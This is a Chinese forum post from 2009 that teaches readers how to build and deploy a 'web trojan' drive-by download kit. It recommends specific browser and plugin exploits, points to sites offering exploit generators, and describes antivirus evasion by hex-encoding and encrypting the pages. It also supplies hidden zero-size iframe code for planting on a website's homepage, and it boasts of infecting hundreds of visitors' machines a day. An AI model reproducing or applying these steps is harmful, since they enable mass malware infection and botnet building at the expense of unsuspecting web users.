|
|
楼主 |
发表于 2009-1-14 20:29:51
|
显示全部楼层
|阅读模式
来自 浙江省绍兴市
这年头很多机器都装了360.全部自动打补丁了。很多人说靠一些免费的网马生成器,是不会有多少中率的。
现在教大家如何制作一份属于自己的网马,免杀可能不能过一些主动防御。但是我用这种自己的做网马的方式,
日流量5000左右的站,挂一天也能上300~400个鸡。
百度搜索 网马,找到了很多网马生成器。经过我的一些测试,在这里下载了3个网马生成器。很多网马生成器,有些很垃圾,
shellcode完全是唬烂的,根本不能运行。
http://www.jxfhack.com/article/4.htm
http://www.jxfhack.com/article/58.htm
一个是综合网马,一个是ie70day网马。还有一个独立的flash网马生成器。他的免费综合网马已经包含了flash.,所以就不下载flash生成器了
大家先下载下来。免费发布的版本,是别想免杀了,收费的买不起,自己研究了很久,也成功地做出了属于自己的免杀网马!
瑞星2009还是过不去,太牛X了。flash的漏洞卡巴主动也过不去。其他的基本都能过了。
现在把方法讲解给大家。
首先,在洞洞的选择上面。有些洞洞中率比较垃圾,如果放上去,可能会造成网页运行缓慢甚至停止响应,不求数量而求质量。
我们再生成器上面:
看到了不少漏洞,首先是漏洞的选择.我推荐的组合是:MS06***14+MS08***53+暴风漏洞+real11+flash+IE7.
为什么选取这些漏洞呢,因为ms06***14是经典的漏洞,就不多说了,08***53运行的成功率高。很多的番茄啊,深度的系统,默认都是使用暴风影音的,这样的软件很少有人会去下载新版本,新版本广告多而且不稳定。real11的安装量也很大。flash不用说,只要是sp2的系统刚刚装完,flash基本是115版本的,肯定能中。。IE7新出的,。网上生成器很多,我找了1晚上,在上面说的那个网站上面下载的是我唯一运行成功的。shellcode编写的很不错,下载那个高级版本的生成。
用iframe框架来调用。首先其他的几个洞洞全部是htm格式的。免杀的方法是,在网上找网页加密器。
搜索一下很多的。主要是进制的转换,或者大小写改下。再这里可以下载到一个进制转换器。全部转换成16进制的、http://download.csdn.net/source/764837凡是生成htm格式的,全部用记事本打开之后。转换进制。或者再里面加上一些干扰的文字,主要是不要破坏网马的完整性。然后就是加密,转换进制。关于flash网马,我曾经尝试用myccl修改,但是卡巴本地扫描不出来,一上传,开启主动就杀毒的叫了。这个我也没辙了。反正叫就叫吧,照样挂上。这个是个技术活,也是个体力活。
几个洞全部制作完毕之后,就利用iframe框架调用。比如生成的漏洞为 ms06***14.htm ms08***53.htm.real.htm.flash.htm
就自己新建一个index.htm.用记事本编辑。你的网站为www.1.com
<iframe src=www.1.com/ms06***14.htm width=0 height=0></iframe>
<iframe src=www.1.com/ms08***53.htm width=0 height=0></iframe>
<iframe src=www.1.com/realhtm width=0 height=0></iframe>
<iframe src=www.1.com/flash.htm width=0 height=0></iframe>
然后把这些代码放你网站首页去。
一些js挂马,js变形就需要基本的一些网页制作知识了。这里就不多说了。
辛辛苦苦打了这么多字,希望对各位想要一份好的网马的朋友有帮助。有什么错误不足请指正~
看完了觉得我说的有点道理的,请回个贴~ |
|
发表于 2009-1-14 20:37:08
